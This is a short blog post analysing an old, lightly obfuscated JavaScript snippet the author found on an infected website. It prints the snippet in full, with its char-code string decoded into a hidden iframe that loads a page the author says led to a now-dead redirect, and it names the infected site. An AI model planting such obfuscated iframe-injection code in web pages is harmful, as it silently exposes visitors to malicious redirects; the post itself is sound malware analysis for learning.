Code

Oldschool javascript malicious code analysis

I found this olschool piece of poorly obfuscated code during web surfing. Some time ago I decided to collect this kind of stuff for learning purposes… So here you have first one:

var temp="",i,c=0,out="";
var if_uniq_var="02102008-01";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
}
document.write(out);

Strange string with exclamation marks simply stands for:

<iframe style="display: none;" src="dochelp1.html" width="320" height="240" frameborder="0"></iframe>

So this piece of code simply attaches invisible frame to a current document. I didn’t find dochelp1.html on a server with infected website but after googling a while I found it’s contents:

 

Website that’s trying to redirect you to looks dead. This malware isn’t active anymore. I cannot investigare further. End of a story.

Infected source: www.galeriadla.art.pl

Published by

Konrad Fedorczyk

Konrad Fedorczyk

I'm interested in programming and gamedev. I especially luv HTML5 and everything connected to web technologies.

Leave a Reply

Your email address will not be published. Required fields are marked *